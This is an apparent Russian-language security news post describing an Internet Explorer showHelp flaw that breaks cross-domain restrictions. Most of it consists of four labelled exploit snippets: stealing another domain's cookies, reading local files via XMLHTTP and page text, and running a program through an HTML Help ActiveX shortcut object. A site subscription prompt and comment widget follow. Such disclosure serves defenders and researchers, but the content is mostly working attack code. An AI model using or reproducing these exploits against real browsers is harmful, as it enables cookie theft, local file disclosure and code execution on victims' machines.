Функция showHelp в IE позволяет обращаться к
данным других доменов. Дело в том, что вызов
showHelp с аргументом file снимает некоторые
ограничения безопасности и в результае
атакующий может получить полный контроль
над машиной.

Exploit 1:

// Чтение куки
showHelp("file:");showHelp("http://www.google.com/");
showHelp("javascript:alert(document.cookie)");

Exploit 2:

// Чтение файла
showHelp("file:");showHelp("res://shdoclc.dll/about.dlg");
showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}\
catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET',\
'file://c:/test.txt',false);c.send(null);alert(c.responseText)");

Exploit 3:

// Чтение файла
showHelp("file:");showHelp("file://c:/test.txt");
showHelp("javascript:alert(document.body.innerText)");

Exploit 4:

// Запуск программы
showHelp("file:");showHelp("iexplore.chm");showHelp("res:");
showHelp("javascript:location='mk:@MSITStore:C:'");
showHelp("javascript:document.write('<object id=c classid=\
clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\\u003E<param na\
me=Command value=ShortCut\\u003E\<param name=Item1 value=,\
winmine,\\u003E</object\\u003E');c.Click();");

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии